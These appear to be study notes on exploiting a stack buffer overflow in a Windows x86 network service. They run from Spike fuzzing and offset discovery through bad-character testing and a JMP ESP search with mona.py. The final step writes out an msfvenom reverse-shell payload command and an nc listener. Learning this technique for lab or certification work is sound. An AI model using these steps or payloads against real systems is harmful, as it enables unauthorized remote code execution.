Automated
mona.py in Immunity Debugger - can automate most of the manual steps below (cyclic pattern creation and offset lookup, badchar comparison, finding a JMP ESP address)
Spike scripts
Example of a Spike script (.spk): s_readline(); s_string("XXX "); s_string_variable("0");
  s_readline() reads the banner line from the service, s_string("XXX ") is the fixed command name sent as-is (the name of the program/command being fuzzed), s_string_variable("0") is the field Spike replaces with its fuzz strings
Immunity Debugger
Attach it to the running program and watch the registers (EIP, ESP) when it crashes, to find and confirm a potential buffer overflow
Manual
1st Spike
  generic_send_tcp host port spike_script SKIPVAR SKIPSTR (on Kali; SKIPVAR and SKIPSTR are normally 0 0)
2nd Fuzzing
  In Python, for example, using sockets: connect, then send the command prefix + "A" * 100 in a loop, adding 100 A's each round; record the number of A's (X bytes) at which the service stops responding and display "crashed at X bytes"
3rd Finding the offset
  /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length of bytes that crashed>
  Run the same Python script but without the loop, wrapped in a try: send the full pattern once, then read EIP in Immunity Debugger to see which 4 bytes of the pattern landed in it
  /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <EIP value>
4th Overwrite EIP
  Same script, but replace the pattern with buffer = "A" * offset + "B" * 4; EIP must now read 42424242 (the four B's), which proves the offset is right
5th Badchars
  Send every byte \x01-\xff after the B's (a badchar generator script from GitHub, or a one-liner) and compare the bytes on the stack in Immunity (e.g. !mona compare) with what was sent; any byte that is missing, changed, or truncates the buffer is a bad character and must not appear in the shellcode. \x00 is excluded from the start since it terminates C strings.
6th Exploit
  Use mona.py in Immunity Debugger to find a module without ASLR/DEP/SafeSEH (!mona modules) and a JMP ESP inside it (!mona jmp -r esp), which sends execution to the shellcode placed right after the EIP overwrite
  /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb - type JMP ESP to get its machine code: FFE4
  Find that opcode in the chosen module (!mona find -s "\xff\xe4" -m module.dll) to get the address to put in EIP
  /!\ x86 is little-endian: write the address in reverse byte order, e.g. 0x11223344 is sent as "\x44\x33\x22\x11" (struct.pack("<I", addr) in Python)
7th Gain shell
  msfvenom | generates the shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00<other badchars>" -f py
  Prepend a NOP sled (e.g. "\x90" * 16) so the encoder's decoder stub has room, start a listener first (nc -nvlp <port>), then send A's * offset + address + NOPs + shellcode